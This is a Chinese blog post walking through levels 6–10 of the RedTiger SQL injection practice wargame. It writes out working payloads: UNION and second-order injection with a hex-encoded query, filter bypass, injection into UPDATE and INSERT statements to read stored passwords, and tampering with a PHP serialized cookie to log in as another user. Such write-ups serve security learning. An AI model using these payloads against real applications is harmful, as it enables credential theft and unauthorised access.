• Redtiger SQL注入练习(二)


    第六关:

    点击 click me,构造url:user=1',返回user not found。user=1'',同样。

    猜测是数字型注入,构造order by , user=1 order by  X#,得出有5个字段。

    然后,user=0 union select 1,2,3,4,5#,说user not found。不是吧。。。。

    用username试试吧,user=0 union select 1,username,3,4,5 from level6_users where status=1#

    返回如图:

    接下来就需要找密码了。用password试了5个位置,没用。想了好长时间,没有啥思路,只能看大佬的writeup了。(参考https://blog.spoock.com/2016/07/25/redtiger-writeup/)

    知道了可能是sql二次查询:

    1
    2
    3
    4
    5
    6
    7
    8
    $sql = "select username,password from level6_users where id=1";
    $result=mysql_query($sql) or die('<pre>' . mysql_error() . '</pre>' );
    $row1 = mysql_fetch_row($result);
    #从结果中取出username字段
    $username = $row1[1];
    $sql2 = "select username,email from level6_users where username="."'".$username."'";

    构造payload:user=0 union select 1,admin'union select 1,2,3,password,5 from level6_users where status=1#,3,4,5#    返回 user not found,  哦,fuck。

    大佬说转换成16进制,脑子不够用,emmmmmm。

    最终payload:user=0 union select 1,0x061646d696e3127756e696f6e2073656c65637420312c322c332c70617373776f72642c352066726f6d206c6576656c365f7573657273207768657265207374617475733d3123,3,4,5#

    第七关:

    提示如上,过滤了一堆东西,输入一个 ' 试试,报错并且返回sql语句:

    思考后,先把括号闭合,然后经过测试,order by 被ban了,而且注释 #  和--  也无效。

    order by 可以直接用 union select猜  ,注释 -- ,空格可以用%a0等等替换,构造

    payload:')union select 1--%a0, 只能用burp抓包改值,hackbar  post提交不行,不知道为啥,搞了半天没结果。猜测出列数为4。

    结果只显示,3和4.之后注入:')union select 1,2,autor,4 from level7_news--%a0

    最后得到答案。

    第八关:

    看到4个输入框,分别输入一次单引号,发现只有email后可以注入,

    然后没什么思路了,看了大佬们的操作,猜测后台的语句为:

    update table set name='[inputname]',email='[inputemail]',icq='[inputicq]',age='[inputage]' where id=1

    update 语句  后边的值会覆盖前边的值,比如:update table set name=1,email=2,name=2.........

    此时 name最终是2。

    于是我们构造:',name=password,icq='1

    得到admin用户的密码。

    第九关:

    测试发现在text 初添加' 会报错,这里存在注入点。

    猜测后台语句为:

    insert into tablename(autor,title,text) values('[inputautor]','[inputtitle]','[inputtext]')。

    于是构造:

    '), ((select username from level9_users limit 1), (select password from level9_users limit 1),'456

    得到用户名和密码。参考(https://blog.spoock.com/2016/07/25/redtiger-writeup/).

    第十关:

    这关和php序列化有关,比较懵。

    看源代码,有一串base64加密的东西,解密得到:

    a:2:{s:8:"username";s:6:"Monkey";s:8:"password";s:12:"0815password";}

    提示只能用TheMaster登录,但是密码不知道,序列化,可以把密码改成布尔值为1.

    于是改为:a:2:{s:8:"username";s:9:"TheMaster";s:8:"password";b:1;}

    base64加密后提交过关。

  • 相关阅读:
    Jmeter 添加信息头
    Jmeter 添加 计数器
    Jmeter 用户定义的变量的使用
    Jmeter 获取系统时间
    Fiddler抓包工具使用技巧
    使用adb安装apk包到手机上的安装步骤:
    如何验证所使用的电脑Windows系统是正版还是盗版的方法
    VMware 15 虚拟机安装 win 7 操作系统步骤
    MySQL在windows上安装过程
    SecureCRT的下载、安装过程
  • 原文地址:https://www.cnblogs.com/whitehawk/p/9902556.html
Copyright © 2020-2023  润新知